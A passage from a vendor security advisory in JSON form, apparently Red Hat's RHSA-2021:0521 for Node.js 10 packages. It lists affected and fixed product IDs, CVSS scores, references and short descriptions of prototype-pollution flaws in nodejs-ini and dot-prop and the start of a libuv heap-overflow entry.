"7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-8116", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2020-08-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1868196" } ], "notes": [ { "category": "description", "text": "A prototype pollution flaw was found in nodejs-dot-prop. The function set could be tricked into adding or modifying properties of Object.prototype using any of the constructor, prototype, or _proto_ paths. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-dot-prop: prototype pollution", "title": "Vulnerability summary" }, { "category": "other", "text": "In both OpenShift Container Platform (OCP) and OpenShift ServiceMesh (OSSM), the grafana and prometheus containers are behind OpenShift OAuth restricting access to the vulnerable dot-prop library to authenticated users only, therefore the impact is Low.\n\nRed Hat Openshift Container Storage 4 is not affected by this vulnerability, as it already includes patched version of dot-prop(v5.2.0) in noobaa-core container.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8116" }, { "category": "external", "summary": "RHBZ#1868196", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1868196" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8116", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8116" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8116", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8116" }, { "category": "external", "summary": "https://hackerone.com/reports/719856", "url": "https://hackerone.com/reports/719856" } ], "release_date": "2020-01-28T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-dot-prop: prototype pollution" }, { "cve": "CVE-2020-8252", "cwe": { "id": "CWE-122", "name": "Heap-based Buffer Overflow" }, "discovery_date": "2020-09-16T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1879315" } ], "notes": [ { "category": "description", "text": "A flaw has been found in libuv. The realpath() implementation performs an incorrect calculation when allocating a buffer, leading to a potential buffer 